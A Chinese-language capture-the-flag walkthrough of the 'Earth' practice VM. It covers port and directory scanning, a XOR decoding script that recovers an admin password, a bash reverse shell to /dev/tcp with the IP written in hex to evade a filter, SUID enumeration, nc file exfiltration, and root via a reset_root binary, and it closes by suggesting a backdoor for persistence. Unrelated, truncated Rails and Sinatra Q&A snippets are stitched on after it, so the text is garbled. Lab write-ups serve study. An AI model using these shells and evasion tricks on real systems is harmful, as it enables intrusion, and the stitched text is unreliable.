搭建靶场的时候一定要使用NATserver或者其他有虚拟网关的网络模式否则无法扫描到端口开放也无法访问。
-sV 获取系统信息-sT TCP扫描可能会留下日志记录-sC 使用默认脚本(在-A模式下不需要)-p1-xxx 扫描端口号 -p- ==>等价于 -p1-65535 不设置端口就扫描默认端口-Pn 绕过禁用ping-A 进攻性扫描也会运行默认脚本)arp-scan -I eth0 -l #利用arp扫描eth0网卡所在局域网中所有存活的主机 根据得到的信息进行筛选获取目标ipnmap -sV -Pn -sT -sC target-ip 对目标进行端口探测扫描 如果没有结果可以尝试全端口扫描dirb https://earth.local & dirb https://terratest.earth.local/ 使用dirb扫描web应用目录 需要注意的是这里扫描要扫描https协议下的因为上一步的nmap扫描出来的应用是443端口也就是https协议所以这里也要用https
在扫描https://terratest.earth.local/时发现该域名下有个robots.txt泄露 进去发现有一个(Disallow: /testingnotes.*) 代表有这个名字的文件 更换后缀名可以得到后缀txt页面下有一个说明文件 其中泄露的信息 包括管理员用户名terra 并且第三行泄露了一个用以加密的文件 以及加密的算法为XOR
利用python代码进行异或运算获取16进制字符串 并进行解密
#coding:utf-8
import base64
import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
#data1中的数据为https://earth.local页面中最下面一行数据的内容 如果不确定是哪个可以都试试 只有这个数据可以异或出来有效数据
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
#(open('a.txt', 'rb') rb参数表示获取到的是 testdata.txt中内容的16进制 其整体结果为2进制的表现形式。testdata.txt(需要把这个文件和脚本文件放在同一目录下) 是上一步扫描获取到的信息 可以复制出来 也可以 使用命令:wget https://terratest.earth.local/testdata.txt --no-check-certificate
#binascii.b2a_hex 把二进制形式的16进制字符串转换为16进制的形式
res=hex(int(data1,16) ^ int(f,16)) #&与 |或 ^异或 ~非 >>右移 <<左移 异或的时候需要知道必须要与加密文件大小相同
print(res) #输出异或运算后的16进制字符串
将获取到的16进制字符串进行字符转换(在线解密工具) 分析内容对以下字符串进行了多次重复输出earthclimatechangebad4humans 根据上一步泄露的testingnotes.txt文档中信息猜测为密码
find / -name "\*flag\*" 在所有的内容中锁定user_flag.txt为可疑文件反弹 shell 由于无法用nc反弹成功考虑用bash反弹 发现依旧反弹失败
经测试可能过滤了IP尝试使用十六进制格式的ip地址绕过(其实在/var/earth_web/secure_message/forms.py 中可以发现过滤代码 ) bash -i >& /dev/tcp/0X0a000304/5566 0>&1 ( 由于过滤了IP的格式改为16进制 转换地址 )
由于反弹的shell权限不是root。
尝试利用命令继续查找有执行权限的命令 find / -perm -u=s -type f 2>/dev/null
发现有一个reset_root 命令猜测意思是重置root 用strings命令打印文件中可打印的字符 看了后发现跟没看一样 尝试运行 报错
用以下命令将文件上传到本地环境下
攻击机:nc -nlvp 1234 >reset_root
靶机shell:nc 192.168.43.118 1234 < /usr/bin/reset_root
chmod 777 reset_root 给个权限
strace reset_root 解析运行看结果(在执行nc -nlvp 1234 >reset_root 命令的目录下)本地运行 继续报错 提示缺少 三个文件
在靶机shell上创建这三个文件后
touch /dev/shm/kHgTFI5G touch /dev/shm/Zw7bV9U5 touch/tmp/kcM0Wewe
继续运行 ./reset_root
提示密码重置为Earth了
------->至此获得root权限。
上传后门木马即可获得权限维持。
Sinatra新手;我正在运行一些rspec测试,但在日志中收到了一堆不需要的噪音。如何消除日志中过多的噪音?我仔细检查了环境是否设置为:test,这意味着记录器级别应设置为WARN而不是DEBUG。spec_helper:require"./app"require"sinatra"require"rspec"require"rack/test"require"database_cleaner"require"factory_girl"set:environment,:testFactoryGirl.definition_file_paths=%w{./factories./test/
我有两个Rails模型,即Invoice和Invoice_details。一个Invoice_details属于Invoice,一个Invoice有多个Invoice_details。我无法使用accepts_nested_attributes_forinInvoice通过Invoice模型保存Invoice_details。我收到以下错误:(0.2ms)BEGIN(0.2ms)ROLLBACKCompleted422UnprocessableEntityin25ms(ActiveRecord:4.0ms)ActiveRecord::RecordInvalid(Validationfa
我正在尝试将以下SQL查询转换为ActiveRecord,它正在融化我的大脑。deletefromtablewhereid有什么想法吗?我想做的是限制表中的行数。所以,我想删除少于最近10个条目的所有内容。编辑:通过结合以下几个答案找到了解决方案。Temperature.where('id这给我留下了最新的10个条目。 最佳答案 从您的SQL来看,您似乎想要从表中删除前10条记录。我相信到目前为止的大多数答案都会如此。这里有两个额外的选择:基于MurifoX的版本:Table.where(:id=>Table.order(:id).
我目前正在用Ruby编写一个项目,它使用ActiveRecordgem进行数据库交互,我正在尝试使用ActiveRecord::Base.logger记录所有数据库事件具有以下代码的属性ActiveRecord::Base.logger=Logger.new(File.open('logs/database.log','a'))这适用于迁移等(出于某种原因似乎需要启用日志记录,因为它在禁用时会出现NilClass错误)但是当我尝试运行包含调用ActiveRecord对象的线程守护程序的项目时脚本失败并出现以下错误/System/Library/Frameworks/Ruby.frame
我有一个应用需要发送用户事件邀请。当用户邀请friend(用户)参加事件时,如果尚不存在将用户连接到该事件的新记录,则会创建该记录。我的模型由用户、事件和events_user组成。classEventdefinvite(user_id,*args)user_id.eachdo|u|e=EventsUser.find_or_create_by_event_id_and_user_id(self.id,u)e.save!endendend用法Event.first.invite([1,2,3])我不认为以上是完成我的任务的最有效方法。我设想了一种方法,例如Model.find_or_cr
在许多ruby类之间共享记录器实例的最佳(正确)方法是什么?现在我只是将记录器创建为全局$logger=Logger.new变量,但我觉得有更好的方法可以在不使用全局变量的情况下执行此操作。如果我有以下内容:moduleFooclassAclassBclassC...classZend在所有类之间共享记录器实例的最佳方式是什么?我是以某种方式在Foo模块中声明/创建记录器还是只是使用全局$logger没问题? 最佳答案 在模块中添加常量:moduleFooLogger=Logger.newclassAclassBclassC..
如何在出现异常时指定全局救援,如果您将Sinatra用于API或应用程序,您将如何处理日志记录? 最佳答案 404可以在not_found方法的帮助下处理,例如:not_founddo'Sitedoesnotexist.'end500s可以通过调用带有block的错误方法来处理,例如:errordo"Applicationerror.Plstrylater."end错误的详细信息可以通过request.env中的sinatra.error访问,如下所示:errordo'Anerroroccured:'+request.env['si
例如,假设我有一个名为Products的模型,并且在ProductsController中,我有以下代码用于product_listView以显示已排序的产品。@products=Product.order(params[:order_by])让我们想象一下,在product_listView中,用户可以使用下拉菜单按价格、评级、重量等进行排序。数据库中的产品不会经常更改。我很难理解的是,每次用户选择新的order_by过滤器时,rails是否必须查询,或者rails是否能够以某种方式缓存事件记录以在服务器端重新排序?有没有一种方法可以编写它,以便在用户排序时rails不会重新查询结果
在我的Rails项目中,我有三个模型:classRecipe:recipe_categorizationsaccepts_nested_attributes_for:recipe_categories,allow_destroy::trueendclassCategory:recipe_categorizationsendclassRecipeCategorization通过这个简单的has_many:through设置,我怎样才能像这样获取给定的食谱:@recipe=Recipe.first并根据现有类别向此食谱添加类别,并在相应类别上对其进行更新。所以:@category=#Exi
我有一个帖子属于城市的关系,城市又属于一个州,例如:classPost现在我想找到所有帖子及其所属的城市和州。我编写了以下查询来获取带有城市的帖子,但不知道如何在同一查找器中获取带有城市的相应州:@post=Post.find:all,:include=>[:city]感谢任何帮助。谢谢。 最佳答案 Post.all(:include=>{:city=>:state}) 关于ruby-on-rails-使用Rails事件记录获取二级模型,我们在StackOverflow上找到一个类似的问